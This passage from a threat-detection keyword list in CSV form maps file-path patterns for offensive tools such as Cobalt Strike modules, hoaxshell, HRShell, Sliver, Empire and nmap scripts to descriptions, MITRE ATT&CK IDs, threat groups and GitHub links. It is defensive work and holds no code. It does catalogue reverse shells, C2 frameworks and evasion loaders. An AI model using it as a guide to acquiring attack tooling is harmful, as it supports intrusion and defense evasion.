+"*/hDendron.cs*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/HeapCrypt.git*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" +"*/HellsGate.git*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" +"*/Heroinn/*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*/hid_inject.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/hid_sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/HiddenDesktop.git*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*/hijack_opener/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/hijack_opener/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/HijackHunter/*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/HInvoke.cs*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*/hlldz*","offensive_tool_keyword","Github Username","github username. 'My name is Halil Dalabasmaz. I consider myself Pwner.' containing exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/hlldz","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hnap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hoaxshell*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" +"*/hoaxshell/*.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*/holehe.git*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*/hollow.x64.*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","1","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" +"*/HookDetector.exe*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/hooks/spoof.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*/hop.php*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1098","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/horizon3ai/*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" +"*/hostenum.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*/hostmap-bfk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hostmap-crtsh.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hostmap-robtex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/HouQing/*/Loader.go","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" +"*/HRShell.git*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*/HRShell/*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*/hta_attack/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/HTMLSmuggler.git*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z" +"*/HTMLSmuggler/*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z" +"*/htshells.git*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*/http_payload.ps1*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" +"*/http-adobe-coldfusion-apsa1301.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-affiliate-id.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-apache-negotiation.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-apache-server-status.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-aspnet-debug.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/httpattack.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" +"*/http-auth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-auth-finder.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-avaya-ipoffice-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-awstatstotals-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-axis2-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-backup-finder.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-barracuda-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-bigip-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-c2.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/http-cakephp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-chrono.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-cisco-anyconnect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-coldfusion-subzero.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-comments-displayer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-config-backup.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-cookie-flags.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-cors.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-cross-domain-policy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-csrf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - 